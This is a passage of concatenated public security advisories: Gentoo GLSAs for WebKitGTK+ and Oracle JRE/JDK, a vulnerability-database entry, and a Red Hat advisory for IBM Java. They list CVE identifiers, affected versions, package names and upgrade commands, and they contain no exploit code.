huDUQs/IbSujrdjCWSfz35qU4u9sxPpM8wQR2M7mdfY9qGp+Xgfh/MprSZ4wOuS3
PAAs5Pdr9GfymsB+CDpMEr+DiTOza6SUjIadZ+j2FWaklzg7h1A=
=NYIZ
-----END PGP SIGNATURE-----
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 202003-22
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WebkitGTK+: Multiple vulnerabilities
Date: March 15, 2020
Bugs: #699156, #706374, #709612
ID: 202003-22
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in WebKitGTK+, the worst of
which may lead to arbitrary code execution.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/webkit-gtk < 2.26.4 >= 2.26.4
Description
===========
Multiple vulnerabilities have been discovered in WebKitGTK+. Please
review the referenced CVE identifiers for details.
Impact
======
A remote attacker could execute arbitrary code, cause a Denial of
Service condition, bypass intended memory-read restrictions, conduct a
timing side-channel attack to bypass the Same Origin Policy or obtain
sensitive information.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All WebkitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.26.4"
References
==========
[ 1 ] CVE-2019-8625
https://nvd.nist.gov/vuln/detail/CVE-2019-8625
[ 2 ] CVE-2019-8674
https://nvd.nist.gov/vuln/detail/CVE-2019-8674
[ 3 ] CVE-2019-8707
https://nvd.nist.gov/vuln/detail/CVE-2019-8707
[ 4 ] CVE-2019-8710
https://nvd.nist.gov/vuln/detail/CVE-2019-8710
[ 5 ] CVE-2019-8719
https://nvd.nist.gov/vuln/detail/CVE-2019-8719
[ 6 ] CVE-2019-8720
https://nvd.nist.gov/vuln/detail/CVE-2019-8720
[ 7 ] CVE-2019-8726
https://nvd.nist.gov/vuln/detail/CVE-2019-8726
[ 8 ] CVE-2019-8733
https://nvd.nist.gov/vuln/detail/CVE-2019-8733
[ 9 ] CVE-2019-8735
https://nvd.nist.gov/vuln/detail/CVE-2019-8735
[ 10 ] CVE-2019-8743
https://nvd.nist.gov/vuln/detail/CVE-2019-8743
[ 11 ] CVE-2019-8763
https://nvd.nist.gov/vuln/detail/CVE-2019-8763
[ 12 ] CVE-2019-8764
https://nvd.nist.gov/vuln/detail/CVE-2019-8764
[ 13 ] CVE-2019-8765
https://nvd.nist.gov/vuln/detail/CVE-2019-8765
[ 14 ] CVE-2019-8766
https://nvd.nist.gov/vuln/detail/CVE-2019-8766
[ 15 ] CVE-2019-8768
https://nvd.nist.gov/vuln/detail/CVE-2019-8768
[ 16 ] CVE-2019-8769
https://nvd.nist.gov/vuln/detail/CVE-2019-8769
[ 17 ] CVE-2019-8771
https://nvd.nist.gov/vuln/detail/CVE-2019-8771
[ 18 ] CVE-2019-8782
https://nvd.nist.gov/vuln/detail/CVE-2019-8782
[ 19 ] CVE-2019-8783
https://nvd.nist.gov/vuln/detail/CVE-2019-8783
[ 20 ] CVE-2019-8808
https://nvd.nist.gov/vuln/detail/CVE-2019-8808
[ 21 ] CVE-2019-8811
https://nvd.nist.gov/vuln/detail/CVE-2019-8811
[ 22 ] CVE-2019-8812
https://nvd.nist.gov/vuln/detail/CVE-2019-8812
[ 23 ] CVE-2019-8813
https://nvd.nist.gov/vuln/detail/CVE-2019-8813
[ 24 ] CVE-2019-8814
https://nvd.nist.gov/vuln/detail/CVE-2019-8814
[ 25 ] CVE-2019-8815
https://nvd.nist.gov/vuln/detail/CVE-2019-8815
[ 26 ] CVE-2019-8816
https://nvd.nist.gov/vuln/detail/CVE-2019-8816
[ 27 ] CVE-2019-8819
https://nvd.nist.gov/vuln/detail/CVE-2019-8819
[ 28 ] CVE-2019-8820
https://nvd.nist.gov/vuln/detail/CVE-2019-8820
[ 29 ] CVE-2019-8821
https://nvd.nist.gov/vuln/detail/CVE-2019-8821
[ 30 ] CVE-2019-8822
https://nvd.nist.gov/vuln/detail/CVE-2019-8822
[ 31 ] CVE-2019-8823
https://nvd.nist.gov/vuln/detail/CVE-2019-8823
[ 32 ] CVE-2019-8835
https://nvd.nist.gov/vuln/detail/CVE-2019-8835
[ 33 ] CVE-2019-8844
https://nvd.nist.gov/vuln/detail/CVE-2019-8844
[ 34 ] CVE-2019-8846
https://nvd.nist.gov/vuln/detail/CVE-2019-8846
[ 35 ] CVE-2020-3862
https://nvd.nist.gov/vuln/detail/CVE-2020-3862
[ 36 ] CVE-2020-3864
https://nvd.nist.gov/vuln/detail/CVE-2020-3864
[ 37 ] CVE-2020-3865
https://nvd.nist.gov/vuln/detail/CVE-2020-3865
[ 38 ] CVE-2020-3867
https://nvd.nist.gov/vuln/detail/CVE-2020-3867
[ 39 ] CVE-2020-3868
https://nvd.nist.gov/vuln/detail/CVE-2020-3868
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/202003-22
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2020 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
|
|
var-201310-0353
|
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2013-5789, CVE-2013-5824, CVE-2013-5832, and CVE-2013-5852. (DoS) An attack may be carried out.
The vulnerability can be exploited over multiple protocols. This issue affects the 'Deployment' sub-component. In a typical operating environment, these are of low
security risk as the runtime is not used on untrusted applets. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: java-1.7.0-ibm security update
Advisory ID: RHSA-2013:1507-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-1507.html
Issue date: 2013-11-07
CVE Names: CVE-2013-3829 CVE-2013-4041 CVE-2013-5372
CVE-2013-5375 CVE-2013-5456 CVE-2013-5457
CVE-2013-5458 CVE-2013-5772 CVE-2013-5774
CVE-2013-5776 CVE-2013-5778 CVE-2013-5780
CVE-2013-5782 CVE-2013-5783 CVE-2013-5784
CVE-2013-5787 CVE-2013-5788 CVE-2013-5789
CVE-2013-5790 CVE-2013-5797 CVE-2013-5800
CVE-2013-5801 CVE-2013-5802 CVE-2013-5803
CVE-2013-5804 CVE-2013-5809 CVE-2013-5812
CVE-2013-5814 CVE-2013-5817 CVE-2013-5818
CVE-2013-5819 CVE-2013-5820 CVE-2013-5823
CVE-2013-5824 CVE-2013-5825 CVE-2013-5829
CVE-2013-5830 CVE-2013-5831 CVE-2013-5832
CVE-2013-5838 CVE-2013-5840 CVE-2013-5842
CVE-2013-5843 CVE-2013-5848 CVE-2013-5849
CVE-2013-5850 CVE-2013-5851
=====================================================================
1. Summary:
Updated java-1.7.0-ibm packages that fix several security issues are now
available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, ppc, s390x, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
IBM Java SE version 7 includes the IBM Java Runtime Environment and the IBM
Java Software Development Kit.
This update fixes several vulnerabilities in the IBM Java Runtime
Environment and the IBM Java Software Development Kit. Detailed
vulnerability descriptions are linked from the IBM Security alerts page,
listed in the References section. (CVE-2013-3829, CVE-2013-4041,
CVE-2013-5372, CVE-2013-5375, CVE-2013-5456, CVE-2013-5457, CVE-2013-5458,
CVE-2013-5772, CVE-2013-5774, CVE-2013-5776, CVE-2013-5778, CVE-2013-5780,
CVE-2013-5782, CVE-2013-5783, CVE-2013-5784, CVE-2013-5787, CVE-2013-5788,
CVE-2013-5789, CVE-2013-5790, CVE-2013-5797, CVE-2013-5800, CVE-2013-5801,
CVE-2013-5802, CVE-2013-5803, CVE-2013-5804, CVE-2013-5809, CVE-2013-5812,
CVE-2013-5814, CVE-2013-5817, CVE-2013-5818, CVE-2013-5819, CVE-2013-5820,
CVE-2013-5823, CVE-2013-5824, CVE-2013-5825, CVE-2013-5829, CVE-2013-5830,
CVE-2013-5831, CVE-2013-5832, CVE-2013-5838, CVE-2013-5840, CVE-2013-5842,
CVE-2013-5843, CVE-2013-5848, CVE-2013-5849, CVE-2013-5850, CVE-2013-5851)
All users of java-1.7.0-ibm are advised to upgrade to these updated
packages, containing the IBM Java SE 7 SR6 release. All running
instances of IBM Java must be restarted for the update to take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/site/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
1018713 - CVE-2013-5803 OpenJDK: insufficient checks of KDC replies (JGSS, 8014341)
1018717 - CVE-2013-5772 OpenJDK: insufficient html escaping in jhat (jhat, 8011081)
1018720 - CVE-2013-5797 OpenJDK: insufficient escaping of window title string (Javadoc, 8016675)
1018727 - CVE-2013-5784 OpenJDK: insufficient InterfaceImplementor security checks (Scripting, 8017299)
1018736 - CVE-2013-5790 OpenJDK: insufficient security checks (Beans, 8012071)
1018750 - CVE-2013-5849 OpenJDK: insufficient DataFlavor security checks (AWT, 8012277)
1018755 - CVE-2013-5800 OpenJDK: default keytab path information leak (JGSS, 8022931)
1018785 - CVE-2013-5780 OpenJDK: key data leak via toString() methods (Libraries, 8011071)
1018831 - CVE-2013-5840 OpenJDK: getDeclaringClass() information leak (Libraries, 8014349)
1018972 - CVE-2013-5820 OpenJDK: insufficient security checks (JAXWS, 8017505)
1018977 - CVE-2013-5851 OpenJDK: XML stream factory finder information leak (JAXP, 8013502)
1018984 - CVE-2013-5778 OpenJDK: image conversion out of bounds read (2D, 8014102)
1019108 - CVE-2013-5782 OpenJDK: Incorrect awt_getPixelByte/awt_getPixelShort/awt_setPixelByte/awt_setPixelShort image raster checks (2D, 8014093)
1019110 - CVE-2013-5830 OpenJDK: checkPackageAccess missing security check (Libraries, 8017291)
1019113 - CVE-2013-5809 OpenJDK: JPEGImageReader and JPEGImageWriter missing band size checks (2D, 8013510)
1019115 - CVE-2013-5829 OpenJDK: Java2d Disposer security bypass (2D, 8017287)
1019117 - CVE-2013-5814 OpenJDK: RMIConnection stub missing permission check (CORBA, 8011157)
1019118 - CVE-2013-5817 OpenJDK: VersionHelper12 does not honor modifyThreadGroup restriction (JNDI, 8013739)
1019123 - CVE-2013-5842 OpenJDK: ObjectInputStream/ObjectOutputStream missing checks (Libraries, 8014987)
1019127 - CVE-2013-5850 OpenJDK: Missing CORBA security checks (Libraries, 8017196)
1019130 - CVE-2013-5802 OpenJDK: javax.xml.transform.TransformerFactory does not properly honor XMLConstants.FEATURE_SECURE_PROCESSING (JAXP, 8012425)
1019131 - CVE-2013-5804 OpenJDK: javac does not ignore certain ignorable characters (Javadoc, 8016653)
1019133 - CVE-2013-3829 OpenJDK: java.util.TimeZone does not restrict setting of default time zone (Libraries, 8001029)
1019137 - CVE-2013-5783 OpenJDK: JTable not properly performing certain access checks (Swing, 8013744)
1019139 - CVE-2013-5825 OpenJDK: XML parsing Denial of Service (JAXP, 8014530)
1019145 - CVE-2013-5823 OpenJDK: com.sun.org.apache.xml.internal.security.utils.UnsyncByteArrayOutputStream Denial of Service (Security, 8021290)
1019147 - CVE-2013-5774 OpenJDK: Inet6Address class IPv6 address processing errors (Libraries, 8015743)
1019300 - CVE-2013-5838 OpenJDK: Vulnerability in Libraries component (Libraries, 7023639)
1019691 - CVE-2013-5824 Oracle JDK: unspecified vulnerability fixed in 7u45 (Deployment)
1019692 - CVE-2013-5788 Oracle JDK: unspecified vulnerability fixed in 7u45 (Deployment)
1019693 - CVE-2013-5787 Oracle JDK: unspecified vulnerability fixed in 7u45 (Deployment)
1019697 - CVE-2013-5789 Oracle JDK: unspecified vulnerability fixed in 7u45 (Deployment)
1019701 - CVE-2013-5843 Oracle JDK: unspecified vulnerability fixed in 7u45 (2D)
1019702 - CVE-2013-5832 Oracle JDK: unspecified vulnerability fixed in 7u45 (Deployment)
1019706 - CVE-2013-5812 Oracle JDK: unspecified vulnerability fixed in 7u45 (Deployment)
1019710 - CVE-2013-5801 Oracle JDK: unspecified vulnerability fixed in 7u45 (2D)
1019712 - CVE-2013-5776 Oracle JDK: unspecified vulnerability fixed in 7u45 (Deployment)
1019713 - CVE-2013-5818 Oracle JDK: unspecified vulnerability fixed in 7u45 (Deployment)
1019715 - CVE-2013-5819 Oracle JDK: unspecified vulnerability fixed in 7u45 (Deployment)
1019716 - CVE-2013-5831 Oracle JDK: unspecified vulnerability fixed in 7u45 (Deployment)
1019720 - CVE-2013-5848 Oracle JDK: unspecified vulnerability fixed in 7u45 (Deployment)
1027748 - CVE-2013-5456 IBM JDK: unspecified sandbox bypass (ORB)
1027754 - CVE-2013-5458 IBM JDK: unspecified sandbox bypass (XML)
1027760 - CVE-2013-5457 IBM JDK: unspecified sandbox bypass (ORB)
1027764 - CVE-2013-4041 IBM JDK: unspecified sandbox bypass (JVM)
1027768 - CVE-2013-5375 IBM JDK: unspecified sandbox bypass (XML)
1027825 - CVE-2013-5372 IBM JDK: XML4J xml entity expansion excessive memory use (XML)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
java-1.7.0-ibm-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-demo-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-devel-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-jdbc-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-plugin-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-src-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
x86_64:
java-1.7.0-ibm-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-1.7.0.6.0-1jpp.1.el5_10.x86_64.rpm
java-1.7.0-ibm-demo-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-demo-1.7.0.6.0-1jpp.1.el5_10.x86_64.rpm
java-1.7.0-ibm-devel-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-devel-1.7.0.6.0-1jpp.1.el5_10.x86_64.rpm
java-1.7.0-ibm-jdbc-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-jdbc-1.7.0.6.0-1jpp.1.el5_10.x86_64.rpm
java-1.7.0-ibm-plugin-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-plugin-1.7.0.6.0-1jpp.1.el5_10.x86_64.rpm
java-1.7.0-ibm-src-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-src-1.7.0.6.0-1jpp.1.el5_10.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
java-1.7.0-ibm-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-demo-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-devel-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-jdbc-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-plugin-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-src-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
ppc:
java-1.7.0-ibm-1.7.0.6.0-1jpp.1.el5_10.ppc.rpm
java-1.7.0-ibm-1.7.0.6.0-1jpp.1.el5_10.ppc64.rpm
java-1.7.0-ibm-demo-1.7.0.6.0-1jpp.1.el5_10.ppc.rpm
java-1.7.0-ibm-demo-1.7.0.6.0-1jpp.1.el5_10.ppc64.rpm
java-1.7.0-ibm-devel-1.7.0.6.0-1jpp.1.el5_10.ppc.rpm
java-1.7.0-ibm-devel-1.7.0.6.0-1jpp.1.el5_10.ppc64.rpm
java-1.7.0-ibm-jdbc-1.7.0.6.0-1jpp.1.el5_10.ppc.rpm
java-1.7.0-ibm-jdbc-1.7.0.6.0-1jpp.1.el5_10.ppc64.rpm
java-1.7.0-ibm-plugin-1.7.0.6.0-1jpp.1.el5_10.ppc.rpm
java-1.7.0-ibm-src-1.7.0.6.0-1jpp.1.el5_10.ppc.rpm
java-1.7.0-ibm-src-1.7.0.6.0-1jpp.1.el5_10.ppc64.rpm
s390x:
java-1.7.0-ibm-1.7.0.6.0-1jpp.1.el5_10.s390.rpm
java-1.7.0-ibm-1.7.0.6.0-1jpp.1.el5_10.s390x.rpm
java-1.7.0-ibm-demo-1.7.0.6.0-1jpp.1.el5_10.s390.rpm
java-1.7.0-ibm-demo-1.7.0.6.0-1jpp.1.el5_10.s390x.rpm
java-1.7.0-ibm-devel-1.7.0.6.0-1jpp.1.el5_10.s390.rpm
java-1.7.0-ibm-devel-1.7.0.6.0-1jpp.1.el5_10.s390x.rpm
java-1.7.0-ibm-jdbc-1.7.0.6.0-1jpp.1.el5_10.s390.rpm
java-1.7.0-ibm-jdbc-1.7.0.6.0-1jpp.1.el5_10.s390x.rpm
java-1.7.0-ibm-src-1.7.0.6.0-1jpp.1.el5_10.s390.rpm
java-1.7.0-ibm-src-1.7.0.6.0-1jpp.1.el5_10.s390x.rpm
x86_64:
java-1.7.0-ibm-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-1.7.0.6.0-1jpp.1.el5_10.x86_64.rpm
java-1.7.0-ibm-demo-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-demo-1.7.0.6.0-1jpp.1.el5_10.x86_64.rpm
java-1.7.0-ibm-devel-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-devel-1.7.0.6.0-1jpp.1.el5_10.x86_64.rpm
java-1.7.0-ibm-jdbc-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-jdbc-1.7.0.6.0-1jpp.1.el5_10.x86_64.rpm
java-1.7.0-ibm-plugin-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-plugin-1.7.0.6.0-1jpp.1.el5_10.x86_64.rpm
java-1.7.0-ibm-src-1.7.0.6.0-1jpp.1.el5_10.i386.rpm
java-1.7.0-ibm-src-1.7.0.6.0-1jpp.1.el5_10.x86_64.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
java-1.7.0-ibm-1.7.0.6.0-1jpp.1.el6_4.i686.rpm
java-1.7.0-ibm-demo-1.7.0.6.0-1jpp.1.el6_4.i686.rpm
java-1.7.0-ibm-devel-1.7.0.6.0-1jpp.1.el6_4.i686.rpm
java-1.7.0-ibm-jdbc-1.7.0.6.0-1jpp.1.el6_4.i686.rpm
java-1.7.0-ibm-plugin-1.7.0.6.0-1jpp.1.el6_4.i686.rpm
java-1.7.0-ibm-src-1.7.0.6.0-1jpp.1.el6_4.i686.rpm
x86_64:
java-1.7.0-ibm-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
java-1.7.0-ibm-demo-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
java-1.7.0-ibm-devel-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
java-1.7.0-ibm-jdbc-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
java-1.7.0-ibm-plugin-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
java-1.7.0-ibm-src-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
Red Hat Enterprise Linux HPC Node Supplementary (v. 6):
x86_64:
java-1.7.0-ibm-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
java-1.7.0-ibm-demo-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
java-1.7.0-ibm-devel-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
java-1.7.0-ibm-src-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
java-1.7.0-ibm-1.7.0.6.0-1jpp.1.el6_4.i686.rpm
java-1.7.0-ibm-demo-1.7.0.6.0-1jpp.1.el6_4.i686.rpm
java-1.7.0-ibm-devel-1.7.0.6.0-1jpp.1.el6_4.i686.rpm
java-1.7.0-ibm-jdbc-1.7.0.6.0-1jpp.1.el6_4.i686.rpm
java-1.7.0-ibm-plugin-1.7.0.6.0-1jpp.1.el6_4.i686.rpm
java-1.7.0-ibm-src-1.7.0.6.0-1jpp.1.el6_4.i686.rpm
ppc64:
java-1.7.0-ibm-1.7.0.6.0-1jpp.1.el6_4.ppc64.rpm
java-1.7.0-ibm-demo-1.7.0.6.0-1jpp.1.el6_4.ppc64.rpm
java-1.7.0-ibm-devel-1.7.0.6.0-1jpp.1.el6_4.ppc64.rpm
java-1.7.0-ibm-jdbc-1.7.0.6.0-1jpp.1.el6_4.ppc64.rpm
java-1.7.0-ibm-src-1.7.0.6.0-1jpp.1.el6_4.ppc64.rpm
s390x:
java-1.7.0-ibm-1.7.0.6.0-1jpp.1.el6_4.s390x.rpm
java-1.7.0-ibm-demo-1.7.0.6.0-1jpp.1.el6_4.s390x.rpm
java-1.7.0-ibm-devel-1.7.0.6.0-1jpp.1.el6_4.s390x.rpm
java-1.7.0-ibm-jdbc-1.7.0.6.0-1jpp.1.el6_4.s390x.rpm
java-1.7.0-ibm-src-1.7.0.6.0-1jpp.1.el6_4.s390x.rpm
x86_64:
java-1.7.0-ibm-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
java-1.7.0-ibm-demo-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
java-1.7.0-ibm-devel-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
java-1.7.0-ibm-jdbc-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
java-1.7.0-ibm-plugin-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
java-1.7.0-ibm-src-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
java-1.7.0-ibm-1.7.0.6.0-1jpp.1.el6_4.i686.rpm
java-1.7.0-ibm-demo-1.7.0.6.0-1jpp.1.el6_4.i686.rpm
java-1.7.0-ibm-devel-1.7.0.6.0-1jpp.1.el6_4.i686.rpm
java-1.7.0-ibm-jdbc-1.7.0.6.0-1jpp.1.el6_4.i686.rpm
java-1.7.0-ibm-plugin-1.7.0.6.0-1jpp.1.el6_4.i686.rpm
java-1.7.0-ibm-src-1.7.0.6.0-1jpp.1.el6_4.i686.rpm
x86_64:
java-1.7.0-ibm-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
java-1.7.0-ibm-demo-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
java-1.7.0-ibm-devel-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
java-1.7.0-ibm-jdbc-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
java-1.7.0-ibm-plugin-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
java-1.7.0-ibm-src-1.7.0.6.0-1jpp.1.el6_4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2013-3829.html
https://www.redhat.com/security/data/cve/CVE-2013-4041.html
https://www.redhat.com/security/data/cve/CVE-2013-5372.html
https://www.redhat.com/security/data/cve/CVE-2013-5375.html
https://www.redhat.com/security/data/cve/CVE-2013-5456.html
https://www.redhat.com/security/data/cve/CVE-2013-5457.html
https://www.redhat.com/security/data/cve/CVE-2013-5458.html
https://www.redhat.com/security/data/cve/CVE-2013-5772.html
https://www.redhat.com/security/data/cve/CVE-2013-5774.html
https://www.redhat.com/security/data/cve/CVE-2013-5776.html
https://www.redhat.com/security/data/cve/CVE-2013-5778.html
https://www.redhat.com/security/data/cve/CVE-2013-5780.html
https://www.redhat.com/security/data/cve/CVE-2013-5782.html
https://www.redhat.com/security/data/cve/CVE-2013-5783.html
https://www.redhat.com/security/data/cve/CVE-2013-5784.html
https://www.redhat.com/security/data/cve/CVE-2013-5787.html
https://www.redhat.com/security/data/cve/CVE-2013-5788.html
https://www.redhat.com/security/data/cve/CVE-2013-5789.html
https://www.redhat.com/security/data/cve/CVE-2013-5790.html
https://www.redhat.com/security/data/cve/CVE-2013-5797.html
https://www.redhat.com/security/data/cve/CVE-2013-5800.html
https://www.redhat.com/security/data/cve/CVE-2013-5801.html
https://www.redhat.com/security/data/cve/CVE-2013-5802.html
https://www.redhat.com/security/data/cve/CVE-2013-5803.html
https://www.redhat.com/security/data/cve/CVE-2013-5804.html
https://www.redhat.com/security/data/cve/CVE-2013-5809.html
https://www.redhat.com/security/data/cve/CVE-2013-5812.html
https://www.redhat.com/security/data/cve/CVE-2013-5814.html
https://www.redhat.com/security/data/cve/CVE-2013-5817.html
https://www.redhat.com/security/data/cve/CVE-2013-5818.html
https://www.redhat.com/security/data/cve/CVE-2013-5819.html
https://www.redhat.com/security/data/cve/CVE-2013-5820.html
https://www.redhat.com/security/data/cve/CVE-2013-5823.html
https://www.redhat.com/security/data/cve/CVE-2013-5824.html
https://www.redhat.com/security/data/cve/CVE-2013-5825.html
https://www.redhat.com/security/data/cve/CVE-2013-5829.html
https://www.redhat.com/security/data/cve/CVE-2013-5830.html
https://www.redhat.com/security/data/cve/CVE-2013-5831.html
https://www.redhat.com/security/data/cve/CVE-2013-5832.html
https://www.redhat.com/security/data/cve/CVE-2013-5838.html
https://www.redhat.com/security/data/cve/CVE-2013-5840.html
https://www.redhat.com/security/data/cve/CVE-2013-5842.html
https://www.redhat.com/security/data/cve/CVE-2013-5843.html
https://www.redhat.com/security/data/cve/CVE-2013-5848.html
https://www.redhat.com/security/data/cve/CVE-2013-5849.html
https://www.redhat.com/security/data/cve/CVE-2013-5850.html
https://www.redhat.com/security/data/cve/CVE-2013-5851.html
https://access.redhat.com/security/updates/classification/#critical
https://www.ibm.com/developerworks/java/jdk/alerts/
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFSe8ghXlSAg2UNWIIRAgQCAJ9O3UvBG+vhMICXle9blDKNTBc/OQCfWgVS
R6qJKc835R+WrpHDdTVcaWk=
=dGn4
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201401-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Oracle JRE/JDK: Multiple vulnerabilities
Date: January 27, 2014
Bugs: #404071, #421073, #433094, #438706, #451206, #455174,
#458444, #460360, #466212, #473830, #473980, #488210, #498148
ID: 201401-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in the Oracle JRE/JDK,
allowing attackers to cause unspecified impact.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/sun-jdk <= 1.6.0.45 Vulnerable!
2 dev-java/oracle-jdk-bin < 1.7.0.51 >= 1.7.0.51 *
3 dev-java/sun-jre-bin <= 1.6.0.45 Vulnerable!
4 dev-java/oracle-jre-bin < 1.7.0.51 >= 1.7.0.51 *
5 app-emulation/emul-linux-x86-java
< 1.7.0.51 >= 1.7.0.51 *
-------------------------------------------------------------------
NOTE: Certain packages are still vulnerable. Users should migrate
to another package if one is available or wait for the
existing packages to be marked stable by their
architecture maintainers.
-------------------------------------------------------------------
NOTE: Packages marked with asterisks require manual intervention!
-------------------------------------------------------------------
5 affected packages
Description
===========
Multiple vulnerabilities have been reported in the Oracle Java
implementation. Please review the CVE identifiers referenced below for
details.
Impact
======
An unauthenticated, remote attacker could exploit these vulnerabilities
to execute arbitrary code.
Furthermore, a local or remote attacker could exploit these
vulnerabilities to cause unspecified impact, possibly including remote
execution of arbitrary code.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Oracle JDK 1.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.7.0.51"
All Oracle JRE 1.7 users should upgrade to the latest version:
# emerge --sync
